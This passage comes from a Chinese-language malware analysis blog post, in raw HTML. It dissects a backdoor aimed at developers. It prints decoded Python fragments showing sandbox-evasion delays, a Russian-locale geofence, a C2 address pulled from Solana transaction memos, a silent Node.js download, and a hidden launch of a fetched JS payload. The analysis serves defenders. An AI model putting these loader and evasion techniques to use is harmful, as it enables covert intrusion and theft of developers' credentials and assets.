5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">134</span></code><span leaf=""> 被硬编码在代码中（变量 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">idzextbcjbgkdih</span></code><span leaf="">），但被无意义的随机变量名所掩盖。</span></p></li></ol><p data-line="37" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">最后，通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">exec(compile(...))</span></code><span leaf=""> 直接在内存中编译执行载荷，确保明文的恶意代码永不落地到硬盘上。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="41" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">2. 剥开混淆：解码后的 Python 载荷</span></h2><p data-line="43" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">当我们用脚本剥开这三层外衣，还原出真实的 Python 载荷时，一个架构成熟、极其克制的高级后门展现在我们面前。</span></p><h3 data-line="45" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">2.1 规避与反分析：克制的猎手</span></h3><p data-line="47" style="margin: 1.5em 8px 0px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这段代码有着多重对抗机制。 </span></p><p data-line="47" style="margin: 0px 8px 1.5em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">首先是沙箱规避：主函数启动后直接调用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">await asyncio.sleep(10)</span></code><span leaf="">。这简单的 10 秒延时，足以耗尽大量自动化分析沙箱的执行时间限制，让沙箱得出“无恶意行为”的结论。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># Ждем 10 секунд перед выполнением (执行前等待 10 秒)</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">await</span></span><span leaf=""> asyncio.sleep(</span><span style="color: rgb(76, 129, 201);"><span leaf="">10</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># Проверка на русскую систему (检查是否为俄罗斯系统)</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> _isRussianSystem():</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">print</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Russian system detected, skipping execution&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">def</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">_isRussianSystem</span></span><span leaf="">():</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># Проверка языка системы (检查系统语言)</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    username = os.getenv(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;USERNAME&#34;</span></span><span leaf="">) </span><span style="color: rgb(0, 72, 171);"><span leaf="">or</span></span><span leaf=""> os.getenv(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;USER&#34;</span></span><span leaf="">) </span><span style="color: rgb(0, 72, 171);"><span leaf="">or</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    lang = os.getenv(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;LANG&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    language = os.getenv(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;LANGUAGE&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    lc_all = os.getenv(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;LC_ALL&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># ...[检测 ru_RU, russian 等字符串]...</span></span></p></code></pre></div><p data-line="68" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">更值得注意的是其内置的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">地理围栏（Geo-fencing）</span></strong><span leaf=""> 策略。代码中定义了 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">_isRussianSystem()</span></code><span leaf=""> 函数，它会细致地提取系统的语言环境变量（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">LANG</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">LANGUAGE</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">LC_ALL</span></code><span leaf="">）、用户名、本地化设置以及系统时区信息。一旦检测到系统处于俄罗斯或相关俄语区，程序将直接静默退出。结合代码中留下的俄语注释，这是东欧网络犯罪组织的经典操作：绝不感染“自己人”，以此降低被本国执法机构打击的风险。</span></p><p data-line="70" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">此外，为了降低自身行为的异常频率，它会在受害者主目录生成 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/init.json</span></code><span leaf=""> 记录执行时间戳。只有距上次执行超过 2 天，才会启动恶意逻辑——这种极度的克制，使其能长期潜伏在开发者电脑中而不被察觉。</span></p><h3 data-line="72" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">2.2 无法封堵的指挥中心：当 C2 藏进区块链</span></h3><p data-line="74" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在追踪它的 C2（命令与控制）服务器时，我们遇到了最棘手的设计。它摒弃了传统的硬编码域名或 IP，而是将 C2 地址藏在了 Solana 区块链上。</span></p><p data-line="76" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">代码中硬编码了一个 Solana 钱包地址（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC</span></code><span leaf="">），并内置了 9 个公开的 RPC 节点（如 Alchemy, Tatum 等）以保证极高的高可用性。攻击者只需要向这个钱包发送一笔交易，将新 C2 的加密 URL 写在交易的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Memo</span></code><span leaf=""> 字段中。脚本会遍历查询该地址的交易签名（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">getSignaturesForAddress</span></code><span leaf="">），解析 Memo 数据并提取下阶段载荷的下载链接。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">while</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">not</span></span><span leaf=""> memo:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    signatures = </span><span style="color: rgb(0, 72, 171);"><span leaf="">await</span></span><span leaf=""> _getSignFAddress(</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC&#34;</span></span><span leaf="">, {</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;limit&#34;</span></span><span leaf="">: </span><span style="color: rgb(76, 129, 201);"><span leaf="">1000</span></span><span leaf="">}</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    )</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">not</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">isinstance</span></span><span leaf="">(signatures, </span><span style="color: rgb(0, 72, 171);"><span leaf="">list</span></span><span leaf="">) </span><span style="color: rgb(0, 72, 171);"><span leaf="">or</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">len</span></span><span leaf="">(signatures) == </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">await</span></span><span leaf=""> asyncio.sleep(</span><span style="color: rgb(76, 129, 201);"><span leaf="">10</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">continue</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># Фильтрация транзакций с memo (过滤带有 memo 的交易)</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    memo_transactions = [x </span><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> x </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> signatures </span><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> x </span><span style="color: rgb(0, 72, 171);"><span leaf="">and</span></span><span leaf=""> x.get(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;memo&#34;</span></span><span leaf="">)]</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> memo_transactions:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        memo = memo_transactions[</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">][</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;memo&#34;</span></span><span leaf="">]</span></p></code></pre></div><figure data-line="94" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8148148148148148" data-s="300,640" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/jHUbrwW0VwUoNwOervYd3PFHqgrsnhJlj0YxG2HVBYKdFwj8Ic5PRtXu4cLvqicibnOBBicCd7J36fzOZOeZ65nR8Tlbn0MleAVic0w5HjVH2xA/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="530" data-cropsely2="432" data-imgfileid="100027813" src="https://wechat2rss.xlab.app/img-proxy/?k=32141c92&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwUoNwOervYd3PFHqgrsnhJlj0YxG2HVBYKdFwj8Ic5PRtXu4cLvqicibnOBBicCd7J36fzOZOeZ65nR8Tlbn0MleAVic0w5HjVH2xA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="96" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">传统的基于域名的 C2 一旦被安全厂商发现，很快就会被 DNS 阻断。但区块链是一个永不下线的公告板，任何人都无法删除链上的交易记录。当旧的 C2 暴露被封禁时，攻击者只需发一笔链上交易，就能指挥全球所有被感染的机器切换到新地址，而无需修改任何已部署的恶意代码。</span></p><h3 data-line="98" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">2.3 静默入场：无感知的 Node.js 运行时投递</span></h3><p data-line="100" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">由于下一阶段的恶意载荷为 JavaScript，为了确保极高的跨平台兼容性，攻击者做了一个大胆的决定：自带运行环境。</span></p><p data-line="102" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">脚本会根据当前操作系统的平台（Windows/Darwin/Linux）及架构（x86/arm64），动态拼接并下载官方 Node.js v22.9.0 的压缩包。它会将压缩包下载至用户的主目录（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~</span></code><span leaf="">）并直接解压调用。整个过程不需要系统管理员权限，也不会触发任何系统安装弹窗，真正做到了“静默入场”。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># Определяем URL для скачивания в зависимости от платформы (根据平台确定下载 URL)</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">system = platform.system()</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">machine = platform.machine().lower()</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> system == </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Windows&#34;</span></span><span leaf="">:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;amd64&#34;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> machine </span><span style="color: rgb(0, 72, 171);"><span leaf="">or</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;x86_64&#34;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> machine </span><span style="color: rgb(0, 72, 171);"><span leaf="">or</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;x64&#34;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> machine:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        url = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="https://nodejs.org/download/release/v22.9.0/node-v22.9.0-win-x64.zip" target="_blank">https://nodejs.org/download/release/v22.9.0/node-v22.9.0-win-x64.zip</a>&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># ...</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">elif</span></span><span leaf=""> system == </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Darwin&#34;</span></span><span leaf="">:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;arm&#34;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> machine </span><span style="color: rgb(0, 72, 171);"><span leaf="">or</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;aarch64&#34;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> machine:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        url = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="https://nodejs.org/download/release/v22.9.0/node-v22.9.0-darwin-arm64.tar.gz" target="_blank">https://nodejs.org/download/release/v22.9.0/node-v22.9.0-darwin-arm64.tar.gz</a>&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># ...</span></span></p></code></pre></div><p data-line="119" style="margin: 1.5em 8px 0px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">更巧妙的是其对抗网络流量审计的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AES 分离密钥机制</span></strong><span leaf="">。 </span></p><p data-line="119" style="margin: 0px 8px 1.5em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在向 C2 请求后续 JS 载荷时，HTTP 响应体（Body）里是被加密混淆的 JS 代码（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">uezupbxi</span></code><span leaf="">）。而解密它所需的密钥 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">iv</span></code><span leaf=""> 和 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">secretKey</span></code><span leaf="">，却被 Base64 编码后藏在了 HTTP 的响应头（Header）中（键名为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">aXZiYXNlNjQ=</span></code><span leaf=""> 和 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">c2VjcmV0a2V5</span></code><span leaf="">）。</span></p><p data-line="122" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">传统依靠分析 Body 载荷的安全沙箱将无法解开此加密块——Body 和 Header 必须同时捕获并关联才能还原完整载荷，这种网络协议层的“骨肉分离”设计，实现了高强度的 Bypass。</span></p><h3 data-line="124" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">2.4 隐蔽执行：不留痕迹的交接</span></h3><p data-line="126" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">为了执行这段费尽心机传进来的 JS 代码，Python 脚本会在当前目录动态生成一个中转 JS 文件 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">i.js</span></code><span leaf="">。</span></p><p data-line="128" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在调用刚才下载的 Node.js 执行它时，如果是在 Windows 环境下，木马会特意通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">creationflags=subprocess.CREATE_NO_WINDOW</span></code><span leaf=""> 标志启动进程。这个参数的唯一作用，就是防止在启动 Node.js 时闪过哪怕一瞬间的黑色命令行窗口。此外，它还会附带特异性的 HTTP 请求头 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">os: &lt;platform&gt;</span></code><span leaf=""> 从服务端获取专属平台的载荷。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># Выполняем JS файл через Node.js (通过 Node.js 执行 JS 文件)</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">subprocess.Popen(</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    [node_exe, js_file_path],</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    stdout=subprocess.DEVNULL,</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    stderr=subprocess.DEVNULL,</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    creationflags=subprocess.CREATE_NO_WINDOW</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> platform.system() == </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Windows&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">else</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">,</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">)</span></p></code></pre></div><p data-line="142" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">从 Python 到 Node.js 的接力，就这样悄无声息完成了。</span></p><h2 data-line="144" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">3. 终极载荷：一次性掠夺你的数字资产</span></h2><p data-line="146" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">当 JavaScript 载荷在内存中解密并执行时，它不再小心翼翼。它是一台针对现代开发者数字资产和供应链权限量身定制的收割机，执行着极其冷酷的掠夺逻辑。</span></p><h3 data-line="148" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3.1 骗取 Root：一个假弹窗的代价</span></h3><p data-line="150" style="margin: 1.5em 8px 0px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">为了在 macOS 系统中执行高危操作（如替换系统级别的应用程序），木马需要 root 权限。</span></p><p data-line="150" style="margin: 0px 8px 1.5em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">它没有选择硬核的提权漏洞，而是采用了一种极具欺骗性的社会工程学手段：使用 